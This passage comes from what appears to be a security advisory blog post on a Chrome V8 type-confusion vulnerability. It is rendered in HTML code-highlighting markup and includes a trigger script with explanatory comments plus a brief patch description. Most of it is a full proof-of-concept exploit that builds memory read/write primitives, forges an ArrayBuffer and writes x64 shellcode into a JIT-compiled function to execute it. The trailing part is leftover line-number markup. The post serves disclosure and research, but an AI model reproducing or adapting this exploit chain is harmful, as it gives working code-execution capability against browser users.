class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-19\"><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-21\"><span class=\"crayon-c\">\/\/ Change the object\u2019s \u2018x\u2019 property type. 
The previous \u2018x\u2019 transition from M0 to M1 will be removed, and M1 will be deprecated. A new map, M2, with a new \u2018x\u2019 transition from M0 is generated.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-22\"><span class=\"crayon-v\">map_manipulator<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-26\"><span class=\"crayon-c\">\/\/ Generate the object we\u2019ll use for the vulnerability. 
Make sure it is of the M2 map.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-27\"><span class=\"crayon-v\">evil<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-28\"><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-30\"><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-31\"><span class=\"crayon-c\">\/\/ Optimize change_elements_kind. <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-32\"><span class=\"crayon-c\">\/\/ ReduceElementAccess will be called, and it will in turn call ComputeElementAccessInfos. 
In the code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-33\"><span class=\"crayon-c\">\/\/ snippet below (same as before), we can see that the code runs through all the maps (Note: these are \/\/ maps that have already been used in this function and compiled), and tries to update each of them.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-34\"><span class=\"crayon-c\">\/\/ When reaching M1, TryUpdate will see that it\u2019s deprecated and look for a suitable non-deprecated <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-35\"><span class=\"crayon-c\">\/\/ map, and will find M2, since it has the same properties. Therefore, an elements kind transition will be <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-36\"><span class=\"crayon-c\">\/\/ created from M2.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-37\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x50000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-39\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-41\"><span class=\"crayon-c\">\/\/ Optimize read_as_unboxed. Evil is currently an instance of the M2 map, so the function will be<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-42\"><span class=\"crayon-c\">\/\/ optimized for that, and for fast element access (evil only holds unboxed numbered properties).<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-43\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x50000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">read_as_unboxed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-45\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5994c4d8266a2429298345-47\"><span class=\"crayon-c\">\/\/ Trigger an elements kind change on evil. Since change_elements_kind was optimized with an<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-48\"><span class=\"crayon-c\">\/\/ elements kind transition, evil\u2019s map will only be changed to reflect the new elements kind.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-49\"><span class=\"crayon-e\">change_elements_kind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-51\"><span class=\"crayon-c\">\/\/ Call read_as_unboxed. It\u2019s still the same M2 so a cache miss does not occur, and the optimized <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-52\"><span class=\"crayon-c\">\/\/ version is executed. 
However, that version assumes that the values in the elements array are unboxed<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-53\"><span class=\"crayon-c\">\/\/ so the Array constructor pointer (stored at position 0 in change_elements_kind) will be returned as a<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-54\"><span class=\"crayon-c\">\/\/ double.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a2429298345-55\"><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">read_as_unboxed<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a2429298345-56\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p><strong><u>Patch<\/u><\/strong><br \/> Very simple, an <em>is_stable()<\/em> check is added before the call to <em>FindElementsKindTransitionedMap<\/em>.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3.png\" data-slb-active=\"1\" data-slb-asset=\"1231653416\" data-slb-internal=\"0\" data-slb-group=\"3379\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3-300x113.png\" alt=\"\" width=\"300\" height=\"113\" class=\"alignnone size-medium wp-image-3384\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3-300x113.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3-768x290.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/ChromeRCE3.png 876w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong><u>Full Proof of 
Concept<\/u><\/strong><\/p>\n<p>The following PoC launches calc when run against Chrome version 59 started with --no-sandbox. <\/p>\n<ol>\n<li>The vulnerability is used to read the address of <em>arraybuffer.__proto__<\/em>.<\/li>\n<li>We build a fake <em>ArrayBuffer<\/em> map (using the address of the arraybuffer proto needed in a map), and use the vulnerability to read the address of the fake map.<\/li>\n<li>Using the address of the fake map, we can build a fake <em>ArrayBuffer<\/em> object with that map, and use the vulnerability again to get its address.<\/li>\n<li>We use the vulnerability to write the pointer to our fake <em>ArrayBuffer<\/em> into a boxed elements array, allowing us to access our fake <em>ArrayBuffer<\/em> regularly from JS code. At the same time, we can edit the fake <em>ArrayBuffer<\/em> so that it maps onto different parts of usermode memory, which gives us full read\/write access. We use the vulnerability one more time to read the address of a compiled function, then use our R\/W capabilities to overwrite it with our shellcode, and finally call the function to execute the shellcode.<\/li>\n<\/ol>\n<p>    \t\t<\/p>\n<div id=\"crayon-5994c4d8266a7993443183\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line 
Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;    var shellcode = [0xe48348fc,0x00c0e8f0,0x51410000,0x51525041,0xd2314856,0x528b4865,0x528b4860,0x528b4818,0x728b4820,0xb70f4850,0x314d4a4a,0xc03148c9,0x7c613cac,0x41202c02,0x410dc9c1,0xede2c101,0x48514152,0x8b20528b,0x01483c42,0x88808bd0,0x48000000,0x6774c085,0x50d00148,0x4418488b,0x4920408b,0x56e3d001,0x41c9ff48,0x4888348b,0x314dd601,0xc03148c9,0xc9c141ac,0xc101410d,0xf175e038,0x244c034c,0xd1394508,0x4458d875,0x4924408b,0x4166d001,0x44480c8b,0x491c408b,0x8b41d001,0x01488804,0x415841d0,0x5a595e58,0x59415841,0x83485a41,0x524120ec,0x4158e0ff,0x8b485a59,0xff57e912,0x485dffff,0x000001ba,0x00000000,0x8d8d4800,0x00000101,0x8b31ba41,0xd5ff876f,0xa2b5f0bb,0xa6ba4156,0xff9dbd95,0xc48348d5,0x7c063c28,0xe0fb800a,0x47bb0575,0x6a6f7213,0x89415900,0x63d5ffda,0x00636c61]  \t  var arraybuffer = new ArrayBuffer(20);  flag = 0;  function gc(){      for(var i=0;i&lt;0x100000\/0x10;i++){          new 
String;      }  }  function d2u(num1,num2){      d = new Uint32Array(2);      d[0] = num2;      d[1] = num1;      f = new Float64Array(d.buffer);      return f[0];  }  function u2d(num){      f = new Float64Array(1);      f[0] = num;      d = new Uint32Array(f.buffer);      return d[1] * 0x100000000 + d[0];  }  function change_to_float(intarr,floatarr){      var j = 0;      for(var i = 0;i &lt; intarr.length;i = i+2){          var re = d2u(intarr[i+1],intarr[i]);          floatarr[j] = re;          j++;      }  }  function change_elements_kind_array(a){  \ta[0] = Array;  }  optimizer3 = new Array({});   optimizer3.x3 = {};  change_elements_kind_array(optimizer3);  map_manipulator3 = new Array(1.1,2.2);   map_manipulator3.x3 = 0x123;  change_elements_kind_array(map_manipulator3);    map_manipulator3.x3 = {};    evil3 = new Array(1.1,2.2);  evil3.x3 = {};  for(var i = 0;i&lt;0x100000;i++){  \tchange_elements_kind_array(optimizer3);  }    \/******************************* step 1    read ArrayBuffer __proto__ address   ***************************************\/  function change_elements_kind_parameter(a,obj){  \targuments;  \ta[0] = obj;  }  optimizer4 = new Array({});   optimizer4.x4 = {};  change_elements_kind_parameter(optimizer4);  map_manipulator4 = new Array(1.1,2.2);   map_manipulator4.x4 = 0x123;  change_elements_kind_parameter(map_manipulator4);    map_manipulator4.x4 = {};    evil4 = new Array(1.1,2.2);  evil4.x4 = {};  for(var i = 0;i&lt;0x100000;i++){  \tchange_elements_kind_parameter(optimizer4,arraybuffer.__proto__);  }    function e4(){  \treturn evil4[0];  }    for(var i = 0;i&lt;0x100000;i++){  \te4();  }    change_elements_kind_parameter(evil4,arraybuffer.__proto__);  ab_proto_addr = u2d(e4());    var nop = 0xdaba0000;  var ab_map_obj = [  \tnop,nop,  \t0x1f000008,0x000900c3,   \/\/chrome 59  \t\/\/0x0d00000a,0x000900c4,  \/\/chrome 61  \t0x082003ff,0x0,  \tnop,nop,   \/\/ use ut32.prototype replace it  \tnop,nop,0x0,0x0  ]  ab_constructor_addr = 
ab_proto_addr &#8211; 0x70;  ab_map_obj[0x6] = ab_proto_addr &amp; 0xffffffff;  ab_map_obj[0x7] = ab_proto_addr \/ 0x100000000;  ab_map_obj[0x8] = ab_constructor_addr &amp; 0xffffffff;  ab_map_obj[0x9] = ab_constructor_addr \/ 0x100000000;  float_arr = [];    gc();  var ab_map_obj_float = [1.1,1.1,1.1,1.1,1.1,1.1];  change_to_float(ab_map_obj,ab_map_obj_float);    \/******************************* step 2    read fake_ab_map_ address   ***************************************\/    change_elements_kind_parameter(evil4,ab_map_obj_float);  ab_map_obj_addr = u2d(e4())+0x40;    var fake_ab = [  \tab_map_obj_addr &amp; 0xffffffff, ab_map_obj_addr \/ 0x100000000,  \tab_map_obj_addr &amp; 0xffffffff, ab_map_obj_addr \/ 0x100000000,  \tab_map_obj_addr &amp; 0xffffffff, ab_map_obj_addr \/ 0x100000000,  \t0x0,0x4000, \/* buffer length *\/  \t0x12345678,0x123,\/* buffer address *\/  \t0x4,0x0  ]  var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];  change_to_float(fake_ab,fake_ab_float);    \/******************************* step 3    read fake_ArrayBuffer_address   ***************************************\/    change_elements_kind_parameter(evil4,fake_ab_float);  fake_ab_float_addr = u2d(e4())+0x40;    \/******************************* step 4 fake a ArrayBuffer   ***************************************\/    fake_ab_float_addr_f = d2u(fake_ab_float_addr \/ 0x100000000,fake_ab_float_addr &amp; 0xffffffff).toString();    eval(&#8216;function e3(){  evil3[1] = &#8216;+fake_ab_float_addr_f+&#8217;;}&#8217;)  for(var i = 0;i&lt;0x6000;i++){  \te3();  }  change_elements_kind_array(evil3);  e3();  fake_arraybuffer = evil3[1];  if(fake_arraybuffer instanceof ArrayBuffer == true){  }  fake_dv = new DataView(fake_arraybuffer,0,0&#215;4000);    \/******************************* step 5 Read a Function Address   ***************************************\/    var func_body = &#8220;eval(&#8221;);&#8221;;    var function_to_shellcode = new Function(&#8220;a&#8221;,func_body);    
change_elements_kind_parameter(evil4,function_to_shellcode);    shellcode_address_ref = u2d(e4()) + 0x38-1;  \t  \/**************************************  And now,we get arbitrary memory read write!!!!!!   ******************************************\/  \t  \tfunction Read32(addr){  \t\tfake_ab_float[4] = d2u(addr \/ 0x100000000,addr &amp; 0xffffffff);  \t\treturn fake_dv.getUint32(0,true);  \t}  \tfunction Write32(addr,value){  \t\tfake_ab_float[4] = d2u(addr \/ 0x100000000,addr &amp; 0xffffffff);  \t\talert(&#8220;w&#8221;);  \t\tfake_dv.setUint32(0,value,true);  \t}  \tshellcode_address = Read32(shellcode_address_ref) + Read32(shellcode_address_ref+0x4) * 0x100000000;;  \t  \tvar addr = shellcode_address;  \t  \tfake_ab_float[4] = d2u(addr \/ 0x100000000,addr &amp; 0xffffffff);  \tfor(var i = 0; i &lt; shellcode.length;i++){  \t\tvar value = shellcode[i];\t\t  \t\tfake_dv.setUint32(i * 4,value,true);  \t}  \talert(&#8220;boom&#8221;);  \tfunction_to_shellcode();      &lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5994c4d8266a7993443183-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5994c4d8266a7993443183-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-112\">112<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5994c4d8266a7993443183-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-133\">133<\/div>\n<div class=\"crayon-num 
crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5994c4d8266a7993443183-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5994c4d8266a7993443183-154\">154<\/div>\n<div 
